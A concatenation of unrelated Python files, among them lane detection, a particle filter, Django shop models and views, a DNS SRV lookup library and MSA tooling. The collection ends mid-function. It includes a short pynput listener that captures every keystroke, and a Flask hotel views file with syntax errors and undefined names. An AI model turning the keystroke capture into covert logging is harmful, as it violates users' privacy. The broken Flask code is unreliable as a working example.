# Color lane pixels for current row to be green
im[i + self.data_min, start:end, 1] = 255
# Add Red spectrum based on how much away vehicle is from lane center
im[i + self.data_min, start:end, 2] = \
abs(self.vehicle_center) / ((self.lane_width - self.vehicle_width) / 2) * 255
return im
def mask_frame(self, frame):
"""
Mask/Highlight given frame with currently estimated lane area
:param frame: Current frame
:return: Masked frame
"""
# Get mask, un wrap the perspective and overlay on frame
mask = self.create_image_mask()
lane_mask = self.perspective_unwrap(mask)
frame = cv2.addWeighted(frame, 1, lane_mask, 0.5, 0)
# Check where vehicle is relative to lane center
direction = "left" if self.vehicle_center < 0 else "right"
# Show current curvature and vehicle position on image
cv2.putText(
frame,
f"Curvature: {int(self.curvature)} m",
(10, 35),
cv2.FONT_HERSHEY_SIMPLEX,
1, (255, 255, 255), 2,
cv2.LINE_AA
)
cv2.putText(
frame,
f"{direction}: {int(abs(self.vehicle_center) * 100) / 100} m",
(10, 85),
cv2.FONT_HERSHEY_SIMPLEX,
1, (255, 255, 255), 2,
cv2.LINE_AA
)
return frame
def process(self, frame):
"""
Update polynomials using previously estimated lane polynomials and given frame
:param frame: Current undistorted video frame
:return:
"""
# Perspective wrap and threshold the frame
frame = self.preprocess_frame(frame)
# Set search window margin
margin = self.search_window_margin
# Extract nonzero x and y locations from current frame
nonzero_y, nonzero_x = np.nonzero(frame)
# Given polynomials and search window margin check which nonzero pixels are polynomial candidates
nonzero_left = eval_poly(nonzero_y, self.left_poly)
nonzero_right = eval_poly(nonzero_y, self.right_poly)
left_candidates = (
(nonzero_x >= nonzero_left - margin) &
(nonzero_x < nonzero_left + margin)
).nonzero()[0]
right_candidates = (
(nonzero_x >= nonzero_right - margin) &
(nonzero_x < nonzero_right + margin)
).nonzero()[0]
# Extract x and y indices of polynomial candidates for both left and right
left_y = nonzero_y[left_candidates]
left_x = nonzero_x[left_candidates]
right_y = nonzero_y[right_candidates]
right_x = nonzero_x[right_candidates]
# Find confidence point i.e. the y point from top where we have data from both left and right polynomial
# we don't want to highlight area of lane where we are not confident
if np.sum(left_y) > 0 and np.sum(right_y) > 0:
self.data_min = max(left_y.min(), right_y.min())
# If polynomial candidates are greater than a threshold update polynomials both pixel and metric
if np.sum(left_candidates) > 50:
self.left_poly *= 0.7
self.left_poly_m *= 0.7
self.left_poly += 0.3 * np.polyfit(left_y, left_x, 2)
self.left_poly_m += 0.3 * \
np.polyfit(left_y * self.ym_per_pix, (left_x - self.warp_offset) * self.xm_per_pix, 2)
if np.sum(right_candidates > 50):
self.right_poly *= 0.7
self.right_poly_m *= 0.7
self.right_poly += 0.3 * np.polyfit(right_y, right_x, 2)
self.right_poly_m += 0.3 * \
np.polyfit(
right_y * self.ym_per_pix, (right_x - self.warp_offset) * self.xm_per_pix, 2
)
# Check if the found polynomials intercepts are correct if not reinitialize using sliding window method
if not self.are_intercepts_correct():
self.init(frame)
# Estimate lane curvature and vehicle position
self.estimate_curvature_and_position()
def are_intercepts_correct(self):
"""
Check if polynomial are correct by checking if their intercepts are at least 200 pixels apart
:return: None
"""
return self.right_poly[2] - self.left_poly[2] > 200
def __init__(self, frame, roi, warp_offset, win_count=8, search_window_margin=30, min_votes=50):
# Initialize internal parameters
self.win_count = win_count
self.image_size = frame.shape[:2]
self.search_window_margin = search_window_margin
self.min_votes = min_votes
self.roi_source = roi
self.warp_offset = warp_offset
# Estimate perspective transform matrices
self.estimate_perspective_transform()
# Initialize polynomials with sliding window method
preprocessed = self.preprocess_frame(frame)
self.init(preprocessed)
def preprocess_frame(self, frame):
"""
Perspective wrap and threshold frames to make the ready for processing
:param frame: Image
:return: None
"""
wrap = self.perspective_wrap(frame)
return self.threshold(wrap)
def init(self, frame):
"""
Initialize using sliding window method
:param frame: Image
:return: None
"""
self.find_hist_based_anchors(frame)
self.extract_poly(frame)
def estimate_perspective_transform(self):
"""
Calculate perspective transform matrices
:return: None
"""
h, w = self.image_size
offset = self.warp_offset
# Create destination polygon based on offset and image dimensions
roi_dest = np.float32([[w - offset, 0], [w - offset, h], [offset, h], [offset, 0]])
self.M_ = cv2.getPerspectiveTransform(np.float32(self.roi_source), roi_dest)
self.M_inv_ = cv2.getPerspectiveTransform(roi_dest, np.float32(self.roi_source))
def perspective_wrap(self, frame):
"""
Perspective Transform to obtain bird eye view
:param frame: Image
:return: None
"""
h, w = self.image_size
return cv2.warpPerspective(frame, self.M_, (w, h))
def perspective_unwrap(self, frame):
"""
Perspective Transform inverse to obtain original frame from bird eye view
:param frame: Image
:return: None
"""
h, w = self.image_size
return cv2.warpPerspective(frame, self.M_inv_, (w, h))
|
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
# x''(t) + x(t)) = 0
# convert second order ode to first order system
# y'(t) = x(t)
# dydt(t) = -y'(t)
def func(y_vec, t):
y, ydot = y_vec
dydt = [ydot, -y]
return dydt
y0 = [1, 0.0]
t = np.linspace(0, 10, 101)
sol = odeint(func, y0, t)
plt.plot(t, sol[:, 0], 'b', label='x(t)')
plt.plot(t, sol[:, 1], 'g', label='x_prime(t)')
plt.legend(loc='best')
plt.xlabel('t')
plt.grid()
plt.show()
|
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.framework.summary_pb2 import SummaryDescription
from tensorflow.core.util.event_pb2 import Event
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.core.util.event_pb2 import TaggedRunMetadata
from tensorflow.python.ops.summary_ops import tensor_summary
from tensorflow.python.summary.summary import FileWriter
from tensorflow.python.summary.summary import FileWriterCache
from tensorflow.python.summary.summary import audio
from tensorflow.python.summary.summary import get_summary_description
from tensorflow.python.summary.summary import histogram
from tensorflow.python.summary.summary import image
from tensorflow.python.summary.summary import merge
from tensorflow.python.summary.summary import merge_all
from tensorflow.python.summary.summary import scalar
from tensorflow.python.summary.summary import text |
class Tree:
def __init__(self) -> None:
self.root:Node = None
self.nodes = {}
@classmethod
def build(cls, edges, root_value, m):
tree = Tree()
for key, (i, j) in enumerate(edges):
if key == m:
break
if not tree.nodes.get(i):
tree.nodes[i] = Node(i)
if not tree.nodes.get(j):
tree.nodes[j] = Node(j)
tree.nodes[i].add_child(tree.nodes[j])
tree.nodes[j].add_child(tree.nodes[i])
if i == root_value:
tree.root = tree.nodes[i]
elif j == root_value:
tree.root = tree.nodes[j]
return tree
class Node:
def __init__(self, value):
self.value = value
self.children = []
self.visited = False
def add_child(self, node):
self.children.append(node)
def bfs(n, m, edges, s):
tree:Tree = Tree.build(edges, s, m)
array = [tree.root, None]
tree.root.visited = True
height = 6
distances = [-1]*(n-1)
while array:
current = array.pop(0)
if not current:
if not array:
break
height += 6
array.append(None)
current = array.pop(0)
for node in current.children:
if not node.visited:
node.visited =True
if node.value > s:
distances[node.value-2] = height
else:
distances[node.value-1] = height
array.append(node)
return distances
if __name__ == "__main__":
matrix = [[2,3]]
print(bfs(3,1, matrix, 2))
|
from pynput import keyboard
def on_press(key):
print("INPUT:", key)
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
|
import os
import cv2
import glob
import numpy as np
import pandas as pd
def create_video_summary(model, frames, video_as_features, time_length):
scores = model.predict(video_as_features)
scores_median = np.median(scores)
impt_frames = np.argwhere(scores, scores > scores_median)
return create_video_from_frames(impt_frames)
def create_video_from_frames(frames, title, fps=24, fourcc=cv2.VideoWriter_fourcc('m', 'p', '4', 'v')):
img_array = []
for filename in frames:
img = cv2.imread(filename)
height, width, layers = img.shape
size = (width, height)
img_array.append(img)
out = cv2.VideoWriter(title, fourcc, fps, size)
for i in range(len(img_array)):
out.write(img_array[i])
out.release()
|
from elizabeth.core.interdata import ROMANIZATION_ALPHABETS
def romanize(func):
"""Cyrillic letter to latin converter. Romanization of the Russian alphabet
is the process of transliterating the Russian language from the Cyrillic script
into the Latin alphabet.
.. note:: At this moment it's work only for Russian (http://bit.ly/2kjTEO4),
but in future we can add support for all slavic languages or for all Cyrillic languages.
:param func: Function.
:return: Latinized text.
"""
alphabet = ROMANIZATION_ALPHABETS['ru']
def romanized(*args, **kwargs):
result = func(*args, **kwargs)
return ''.join([alphabet[i] for i in result if i in alphabet])
return romanized
|
import argparse
import sys
import os
import numpy as np
import pandas as pd
import glob
import pdb
parser = argparse.ArgumentParser(description = '''Fuse the MSAs for interacting chains by writing gaps where the other chain should be.''')
parser.add_argument('--a3m1', nargs=1, type= str, default=sys.stdin, help = 'Path to a3m file 1.')
parser.add_argument('--a3m2', nargs=1, type= str, default=sys.stdin, help = 'Path to a3m file 2.')
parser.add_argument('--max_gap_fraction', nargs=1, type=float, default=sys.stdin, help = 'The maximal gap fraction allowed in each sequence (default = 0.9).')
parser.add_argument('--outname', nargs=1, type= str, default=sys.stdin, help = 'Path to file to write to.')
def read_a3m(infile,max_gap_fraction=0.9):
'''Read a3m MSA'''
mapping = {'-': 21, 'A': 1, 'B': 21, 'C': 2, 'D': 3, 'E': 4, 'F': 5,
'G': 6,'H': 7, 'I': 8, 'K': 9, 'L': 10, 'M': 11,'N': 12,
'O': 21, 'P': 13,'Q': 14, 'R': 15, 'S': 16, 'T': 17,
'V': 18, 'W': 19, 'Y': 20,'U': 21, 'Z': 21, 'X': 21, 'J': 21}
parsed = []#Save extracted msa
species = []
seqlen = 0
lc = 0
with open(infile, 'r') as file:
for line in file:
line = line.rstrip()
if line.startswith('>'): #OX=OrganismIdentifier
if 'OX=' in line:
OX= line.split('OX=')[1]
if len(OX)>0:
species.append(int(OX.split(' ')[0]))
else:
species.append(0)
else:
species.append(0)
continue
line = line.rstrip()
gap_fraction = line.count('-') / float(len(line))
if gap_fraction <= max_gap_fraction:#Only use the lines with less than 90 % gaps
parsed.append([mapping.get(ch, 22) for ch in line if not ch.islower()])
else:
if len(species)>1:
species = species[:-1] #Remove the previously stored species
continue
#Check that the lengths match
if len(parsed[-1])!=seqlen and lc>=1:
parsed = parsed[:-1]
species = species[:-1]
continue
seqlen = len(parsed[-1])
lc+=1
return np.array(parsed, dtype=np.int8, order='F'), np.array(species)
def write_a3m(fused, outfile):
'''Write a3m MSA'''
backmap = { 1:'A', 2:'C', 3:'D', 4:'E', 5:'F',6:'G' ,7:'H',
8:'I', 9:'K', 10:'L', 11:'M', 12:'N', 13:'P',14:'Q',
15:'R', 16:'S', 17:'T', 18:'V', 19:'W', 20:'Y', 21:'-'} #Here all unusual AAs and gaps are set to the same char (same in the GaussDCA script)
with open(outfile,'w') as file:
for i in range(len(fused)):
file.write('>'+str(i)+'\n')
file.write(''.join([backmap[ch] for ch in fused[i]])+'\n')
return None
#################MAIN####################
#Parse args
args = parser.parse_args()
max_gap_fraction = args.max_gap_fraction[0]
#Data
a3m1, species1 = read_a3m(args.a3m1[0], max_gap_fraction)
a3m2, species2 = read_a3m(args.a3m2[0], max_gap_fraction)
outname = args.outname[0]
#Construct entire a3m matrix
fused = np.zeros((a3m1.shape[0]+a3m2.shape[0],a3m1.shape[1]+a3m2.shape[1]))
fused[:]=21 #Assign gaps
#Assign a3m1
fused[:a3m1.shape[0],:a3m1.shape[1]]=a3m1
#Assign a3m2
fused[a3m1.shape[0]:,a3m1.shape[1]:]=a3m2
#Write the fused MSA
write_a3m(fused, outname)
|
from Employee import *
e1 = Employee("seasonfif", 27)
e2 = Employee("season", 20)
e1.name = "qqq"
setattr(e1, "sex", "female")
getattr(e1, "sex")
e1.displayEmployee()
print Employee.empCount |
import matplotlib.pyplot as plt
import numpy as np
import random as r
import math
from sim.plot import plot, print_particle_error
AUTORUN = False
robot_start = 7
num_particles = 20
distance = 40
poles = [10, 15, 17, 19, 30, 39]
### START STUDENT CODE
class Robot:
def __init__(self, pos):
self.pos = pos
self.move_dist = 1
self.pole_dist = -100
self.max_measurement = 3
# Movement is perfectly accurate, even though we are assuming it isn't.
def move(self):
self.pos += self.move_dist
# Measurement is perfectly accurate even though we are assuming it isn't.
def measure(self, poles):
closest = min([pole - self.pos if (pole - self.pos >= 0) else (self.max_measurement + 1) for pole in poles])
self.pole_dist = closest if closest <= self.max_measurement else -100
class Particle(Robot):
def __init__(self, pos):
Robot.__init__(self, pos)
self.weight = 0
self.measurement_sigma = 0.3
def predict(self):
self.pos = np.random.normal(self.pos + self.move_dist, self.measurement_sigma)
def probability_density_function(self, mu, x):
weight = np.exp((-1/2)*((x - mu)/self.measurement_sigma)**2)/(self.measurement_sigma * np.sqrt(2 * np.pi))
return weight
def update_weight(self, robot_dist):
self.weight = self.probability_density_function(robot_dist, self.pole_dist)
def resample_particles(particles):
# Potentially resample uniformly if weights are so low.
weights = [part.weight for part in particles]
weight_sum = sum(weights)
if weight_sum < 0.05:
resampled_particles = [Particle(r.uniform(0, distance)) for i in range(num_particles)]
else:
resample = r.choices(population=range(num_particles), weights=weights, k=num_particles)
resampled_particles = [Particle(particles[i].pos) for i in resample]
return resampled_particles
### END STUDENT CODE
robot = Robot(robot_start)
# Setup particles.
particles = [Particle(r.uniform(0, distance - 1 )) for i in range(num_particles)]
# Plot starting distribution, no beliefs
plot(particles, poles, robot.pos)
# Begin Calculating
for j in range(39 - robot.pos):
# Move
if j != 0:
robot.move()
for particle in particles:
particle.predict()
# Measure
robot.measure(poles)
for particle in particles:
particle.measure(poles)
# Update Beliefs
particle.update_weight(robot.pole_dist)
print_particle_error(robot, particles)
# Resample
resampled_particles = resample_particles(particles)
plot(particles, poles, robot.pos, resampled_particles, j, AUTORUN)
particles = resampled_particles
plot(particles, poles, robot.pos, resampled_particles)
|
# coding=utf-8
# Copyright 2020 The Real-World RL Suite Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Trains an OpenAI Baselines PPO agent on realworldrl.
Note that OpenAI Gym is not installed with realworldrl by default.
See also github.com/openai/baselines for more information.
This example also relies on dm2gym for its gym environment wrapper.
See github.com/zuoxingdong/dm2gym for more information.
"""
import os
from absl import app
from absl import flags
from baselines import bench
from baselines.common.vec_env import dummy_vec_env
from baselines.ppo2 import ppo2
import dm2gym.envs.dm_suite_env as dm2gym
import realworldrl_suite.environments as rwrl
flags.DEFINE_string('domain_name', 'cartpole', 'domain to solve')
flags.DEFINE_string('task_name', 'realworld_balance', 'task to solve')
flags.DEFINE_string('save_path', '/tmp/rwrl', 'where to save results')
flags.DEFINE_boolean('verbose', True, 'whether to log to std output')
flags.DEFINE_string('network', 'mlp', 'name of network architecture')
flags.DEFINE_float('agent_discount', .99, 'discounting on the agent side')
flags.DEFINE_integer('nsteps', 100, 'number of steps per ppo rollout')
flags.DEFINE_integer('total_timesteps', 1000000, 'total steps for experiment')
flags.DEFINE_float('learning_rate', 1e-3, 'learning rate for optimizer')
FLAGS = flags.FLAGS
class GymEnv(dm2gym.DMSuiteEnv):
"""Wrapper that convert a realworldrl environment to a gym environment."""
def __init__(self, env):
"""Constructor. We reuse the facilities from dm2gym."""
self.env = env
self.metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second': round(1. / self.env.control_timestep())
}
self.observation_space = dm2gym.convert_dm_control_to_gym_space(
self.env.observation_spec())
self.action_space = dm2gym.convert_dm_control_to_gym_space(
self.env.action_spec())
self.viewer = None
def run():
"""Runs a PPO agent on a given environment."""
def _load_env():
"""Loads environment."""
raw_env = rwrl.load(
domain_name=FLAGS.domain_name,
task_name=FLAGS.task_name,
safety_spec=dict(enable=True),
delay_spec=dict(enable=True, actions=20),
log_output=os.path.join(FLAGS.save_path, 'log.npz'),
environment_kwargs=dict(
log_safety_vars=True, log_every=20, flat_observation=True))
env = GymEnv(raw_env)
env = bench.Monitor(env, FLAGS.save_path)
return env
env = dummy_vec_env.DummyVecEnv([_load_env])
ppo2.learn(
env=env,
network=FLAGS.network,
lr=FLAGS.learning_rate,
total_timesteps=FLAGS.total_timesteps, # make sure to run enough steps
nsteps=FLAGS.nsteps,
gamma=FLAGS.agent_discount,
)
def main(argv):
del argv # Unused.
run()
if __name__ == '__main__':
app.run(main)
|
# shop/models.py
# Django modules
from django.db import models
# Create your models here.
# Model: Slider
class Slider(models.Model):
slider_title = models.CharField(max_length=100)
slider_sub_title = models.CharField(max_length=150)
slider_description = models.TextField()
slider_image = models.ImageField(upload_to='sliders//%Y/%m/%d')
slider_image_price = models.ImageField(upload_to='sliders//%Y/%m/%d', blank=True, null=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
verbose_name = 'Slider'
verbose_name_plural = 'Sliders'
def __str__(self):
return self.slider_title
# Model: Category
class Category(models.Model):
category_name = models.CharField(max_length=50, db_index=True)
category_slug = models.SlugField(max_length=100, db_index=True)
class Meta:
verbose_name = 'Category'
verbose_name_plural = 'Categories'
def __str__(self):
return self.category_name
# Model: Sub Category
class SubCategory(models.Model):
subcategory_name = models.CharField(max_length=50)
subcategory_slug = models.SlugField(max_length=100, db_index=True)
category_id = models.ForeignKey(Category, on_delete=models.CASCADE)
class Meta:
verbose_name = 'Subcategory'
verbose_name_plural = 'Subcategories'
def __str__(self):
return self.subcategory_name
# Model: Brand
class Brand(models.Model):
brand_name = models.CharField(max_length=50)
brand_slug = models.SlugField(max_length=100, db_index=True, null=True)
class Meta:
verbose_name = 'Brand'
verbose_name_plural = 'Brands'
def __str__(self):
return self.brand_name
# Model: Product
class Product(models.Model):
product_name = models.CharField(max_length=100, db_index=True)
product_slug = models.SlugField(max_length=100, db_index=True)
category_id = models.ForeignKey(
Category, related_name='products',
on_delete=models.CASCADE)
subcategory_id = models.ForeignKey(
SubCategory, related_name='products',
on_delete=models.CASCADE)
brand_id = models.ForeignKey(
Brand, related_name='products',
on_delete=models.CASCADE, null=True)
product_image = models.ImageField(
upload_to='products/%Y/%m/%d',
blank=True)
product_description = models.TextField(blank=True)
product_price = models.DecimalField(
max_digits=10, decimal_places=2)
is_available = models.BooleanField(default=True)
is_featured = models.BooleanField(default=False)
is_recomended = models.BooleanField(default=False)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
verbose_name = 'Product'
verbose_name_plural = 'Products'
ordering = ('product_name',)
index_together = (('id', 'product_slug'),)
def __str__(self):
return self.product_name
|
from app.core.db import db
from models import *
from flask import Blueprint, request, session, render_template
hotel_views = Blueprint('hotel', __name__,
template_folder='../../templates',
static_folder='../../static')
@hotel_views.route('/hotel')
def hotel():
hotel = Hotel.query.all()
return render_template('list_hotel.html', **locals())
@hotel_views.route('/hotel/<int:id>')
def viewhotel(id):
hotel = Hotel.query.get(id)
return render_template('hotel_details.html', **locals())
@hotel_views.route('/hotel/new', methods=["POST", "GET"])
def newhotel():
if request.method == 'POST':
nama_hotel = request.form.get('NamaHotel', None)
address = request.form.get('Address', None)
zipcode = request.form.get('Zipcode', None)
City = request.form.get('City', None)
Province = request.form.get('Province', None)
Country = request.form.get('Country', None)
Price = request.form.get('Price', None)
added = Hotel(nama_hotel, address, zipcode, city, Province, Country, Price)
db.session.add(added)
db.session.commit()
return render_template('add_hotels.html', **locals())
@hotel_views.route('hotel/del/<int:id')
def delhotel(id):
hotel = Hotel.query.get(id)
db.session.delete(hotel)
db.session.commit()
return redirect('/hotel')
@hotel.views.route('hotel/clear')
def clearhotel:
hotel = Hotel.query.all()
db.session.delete(hotel)
db.session.commit()
return redirect('hotel/')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-08-04 15:30
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def populate_channels_and_boards(apps, schema_editor):
from django.db.models import OuterRef, Subquery, F
Organization = apps.get_model('dominion', 'Organization')
ChannelDB = apps.get_model('comms', 'ChannelDB')
ObjectDB = apps.get_model('objects', 'ObjectDB')
chans = ChannelDB.objects.filter(db_lock_storage__icontains=OuterRef('name')).values_list('id')[:1]
boards = ObjectDB.objects.filter(db_typeclass_path="typeclasses.bulletin_board.bboard.BBoard",
db_lock_storage__icontains=OuterRef('name')).values_list('id')[:1]
Organization.objects.filter(members__player__player__isnull=False).distinct().annotate(chan=Subquery(chans)).annotate(board=Subquery(boards)).update(org_board=F('board'), org_channel=F('chan'))
class Migration(migrations.Migration):
dependencies = [
('objects', '0009_remove_objectdb_db_player'),
('comms', '0015_auto_20170706_2041'),
('dominion', '0029_auto_20180731_0001'),
]
operations = [
migrations.AlterModelOptions(
name='fealty',
options={'verbose_name_plural': 'Fealties'},
),
migrations.AddField(
model_name='member',
name='has_seen_motd',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='organization',
name='org_board',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='org', to='objects.ObjectDB'),
),
migrations.AddField(
model_name='organization',
name='org_channel',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='org', to='comms.ChannelDB'),
),
migrations.RunPython(populate_channels_and_boards)
]
|
"""
Service Lookup
==============
Use DNS SRV records to discover services by name and protocol.
"""
import collections
import logging
import socket
from dns import rdatatype, resolver
__version__ = '2.0.0'
LOGGER = logging.getLogger(__name__)
SRV = collections.namedtuple(
'SRV', ['host', 'port', 'priority', 'weight', 'hostname'])
class SRVQueryFailure(Exception):
"""Exception that is raised when the DNS query has failed."""
def __str__(self):
return 'SRV query failure: %s' % self.args[0]
def lookup(name, protocol='TCP', domain=None):
"""Return a list of service records and associated data for the given
service name, protocol and optional domain. If protocol is not specified,
TCP will be used. If domain is not specified, the domain name returned by
the operating system will be used.
Service records will be returned as a named tuple with host, port, priority
and weight attributes:
>>> import srvlookup
>>> srvlookup.lookup('api', 'memcached')
[SRV(host='192.169.1.100', port=11211, priority=1, weight=0,
hostname='host1.example.com'),
SRV(host='192.168.1.102', port=11211, priority=1, weight=0,
hostname='host2.example.com'),
SRV(host='192.168.1.120', port=11211, priority=1, weight=0,
hostname='host3.example.com'),
SRV(host='192.168.1.126', port=11211, priority=1, weight=0,
hostname='host4.example.com')]
>>>
:param str name: The service name
:param str protocol: The protocol name, defaults to TCP
:param str domain: The domain name to use, defaults to local domain name
:rtype: list of srvlookup.SRV
"""
answer = _query_srv_records('_%s._%s.%s' % (name, protocol,
domain or _get_domain()))
results = _build_result_set(answer)
return sorted(results, key=lambda r: (r.priority, -r.weight, r.host))
def _get_domain():
"""Return the domain name for the local host.
:rtype: str
"""
return '.'.join(socket.getfqdn().split('.')[1:])
def _query_srv_records(fqdn):
"""Query DNS for the SRV records of the fully-qualified domain name
specified.
:param str fqdn: The fully-qualified domain name to query
:rtype: dns.resolver.Answer
:raises: SRVQueryFailure
"""
try:
return resolver.query(fqdn, 'SRV')
except (resolver.NoAnswer, resolver.NoNameservers, resolver.NotAbsolute,
resolver.NoRootSOA, resolver.NXDOMAIN) as error:
LOGGER.error('Error querying SRV for %s: %r', fqdn, error)
raise SRVQueryFailure(error.__class__.__name__)
def _build_resource_to_address_map(answer):
"""Return a dictionary that maps resource name to address.
The response from any DNS query is a list of answer records and
a list of additional records that may be useful. In the case of
SRV queries, the answer section contains SRV records which contain
the service weighting information and a DNS resource name which
requires further resolution. The additional records segment may
contain A records for the resources. This function collects them
into a dictionary that maps resource name to an array of addresses.
:rtype: dict
"""
mapping = collections.defaultdict(list)
for resource in answer.response.additional:
target = resource.name.to_text()
mapping[target].extend(record.address for record in resource.items
if record.rdtype == rdatatype.A)
return mapping
def _build_result_set(answer):
"""Return a list of SRV instances for a DNS answer.
:rtype: list of srvlookup.SRV
"""
resource_map = _build_resource_to_address_map(answer)
result_set = []
for resource in answer:
target = resource.target.to_text()
if target in resource_map:
result_set.extend(
SRV(address, resource.port, resource.priority, resource.weight,
target.strip('.')) for address in resource_map[target])
else:
result_set.append(
SRV(target.rstrip('.'), resource.port, resource.priority,
resource.weight, target.strip('.')))
return result_set
|
from django.shortcuts import render, redirect, HttpResponse
from django.http import JsonResponse
from django.contrib import messages
import datetime
import json
from django.core import serializers
from django.contrib.auth import login, authenticate, logout
from django.contrib.auth.models import User, Group
from django.contrib.auth.forms import AuthenticationForm
from .models import Seller, Customer, Product, Order, CartItem, OrderList
from .forms import SignUpForm, ProfileEditForm, SellerSignUpForm, SellerProfileEditForm, ProductForm
from .sendmail import send_registration_mail, send_login_mail, send_checkout_mail, send_payment_confirmation
def home(request):
products = Product.objects.all()
new = Product.objects.filter(type_choice='New')
trending = Product.objects.filter(type_choice='Trending')
sales = Product.objects.filter(type_choice='Sales')
regular = Product.objects.filter(type_choice='Regular')
party = Product.objects.filter(type_choice='Party')
ethnic = Product.objects.filter(type_choice='Ethnic')
return render(request, 'index.html', {'products': products, 'party': party, 'trending': trending, 'sales': sales, 'new':new, 'regular':regular, 'ethnic':ethnic})
def aboutus(request):
return render(request, 'about/about.html')
def contactus(request):
return render(request, 'about/contact.html')
def careers(request):
return render(request, 'about/careers.html')
def page_not_found(request):
now = datetime.datetime.now()
html = "<h1>%s</h1> <h1> Error in loading</h1><h1>Error 404... Page Not Found !</h1>" % now
return HttpResponse(html)
# USER, SELLER, CUSTOMER AUTHENTICATION AND AUTHORIZATION MANAGEMENT
def signup(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
to_mail = form.cleaned_data.get('email')
user = authenticate(username=username, password=raw_password)
login(request, user)
request.session['username'] = username
print('*********USER DATA : ', user)
customer = Customer(user=user)
customer.save()
print(to_mail)
send_registration_mail(username, to_mail)
return redirect('home')
else:
form = SignUpForm()
return render(request, 'signup.html', {'form': form})
def Login(request):
if request.method == 'POST':
form = AuthenticationForm(request=request, data=request.POST)
if form.is_valid():
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password')
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
request.session['username'] = username
print('*********USER DATA : ', user)
send_login_mail(request.user.first_name, request.user.email)
return redirect('home')
else:
form = AuthenticationForm()
return render(request, 'login.html', {'form': form})
def Logout(request):
logout(request)
return redirect('home')
def profile(request):
if request.user.is_authenticated:
user = User.objects.get(username=request.user)
cust = Customer.objects.get(user=request.user)
return render(request, 'profile.html', {'user': user, 'cust': cust})
else:
messages.info(request, 'Login to acess your profile.')
return redirect('userlogin')
def updateprofile(request):
if request.user.is_authenticated:
if request.method == 'POST':
user = Customer.objects.get(user=request.user)
fmd = ProfileEditForm(request.POST, request.FILES, instance=user)
print(fmd.is_valid())
if fmd.is_valid():
fmd.save()
for d in fmd.cleaned_data.values():
print(d)
image = fmd.cleaned_data['image']
first_name = fmd.cleaned_data['first_name']
last_name = fmd.cleaned_data['last_name']
email = fmd.cleaned_data['email']
phone = fmd.cleaned_data['phone']
dob = fmd.cleaned_data['dob']
residential_address = fmd.cleaned_data['residential_address']
permanent_address = fmd.cleaned_data['permanent_address']
delievery_address = fmd.cleaned_data['delievery_address']
User.objects.filter(username=request.user).update(
first_name=first_name, last_name=last_name, email=email)
# Customer.objects.filter(user=request.user).update(image=image, phone=phone, residential_address=residential_address, permanent_address=permanent_address, delievery_address=delievery_address)
messages.success(request, 'Profile Successfully Updated!')
return redirect('userprofile')
user = User.objects.get(username=request.user)
cust = Customer.objects.get(user=request.user)
form = ProfileEditForm()
return render(request, 'update_profile.html', {'user': user, 'cust': cust, 'form': form})
else:
messages.info(request, 'Login to update your profile.')
redirect('Login')
# Managing Seller
def seller(request):
return render(request, 'about/seller.html')
def signupseller(request):
if request.method == 'POST':
form = SellerSignUpForm(request.POST)
if form.is_valid():
gp = form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
to_mail = form.cleaned_data.get('email')
user = authenticate(username=username, password=raw_password)
login(request, user)
request.session['username'] = username
print('*********USER DATA : ', user)
seller = Seller(user=user)
seller.save()
group = Group.objects.get(name='GroupSeller')
gp.groups.add(group)
messages.success(
request, 'You are now a member of TheShoppingCArt! Thank you! for chosing us.')
send_registration_mail(username, to_mail)
return redirect('home')
else:
form = SellerSignUpForm()
return render(request, 'signup_seller.html', {'form': form})
def sellerprofile(request):
if request.user.is_authenticated:
if request.user.is_staff:
user = User.objects.get(username=request.user)
seller = Seller.objects.get(user=request.user)
return render(request, 'seller_profile.html', {'user': user, 'seller': seller})
messages.warning(request, 'You are not not a seller!')
return redirect('userlogin')
else:
messages.info(request, 'Login to acess your profile.')
return redirect('userlogin')
def updateseller(request):
if request.user.is_authenticated:
if request.user.is_staff:
if request.method == 'POST':
user = Seller.objects.get(user=request.user)
fmd = SellerProfileEditForm(
request.POST, request.FILES, instance=user)
print(fmd.is_valid())
if fmd.is_valid():
fmd.save()
for d in fmd.cleaned_data.values():
print(d)
first_name = fmd.cleaned_data['first_name']
last_name = fmd.cleaned_data['last_name']
email = fmd.cleaned_data['email']
User.objects.filter(username=request.user).update(
first_name=first_name, last_name=last_name, email=email)
messages.success(request, 'Profile Successfully Updated!')
return redirect('sellerprofile')
user = User.objects.get(username=request.user)
seller = Seller.objects.get(user=request.user)
form = SellerProfileEditForm(instance=seller)
return render(request, 'update_seller_profile.html', {'user': user, 'seller': seller, 'form': form})
else:
messages.info(request, 'Login to update your profile.')
redirect('Login')
def dashboard(request):
if request.user.is_authenticated and request.user.is_staff:
seller = Seller.objects.get(user=request.user)
product = Product.objects.all()
messages.success(request, 'Welcome to Admin Dashboard')
return render(request, 'dashboard.html', {'seller': seller, 'products': product})
def addproduct(request):
if request.user.is_authenticated and request.user.is_staff:
if request.method == 'POST':
form = ProductForm(request.POST, request.FILES)
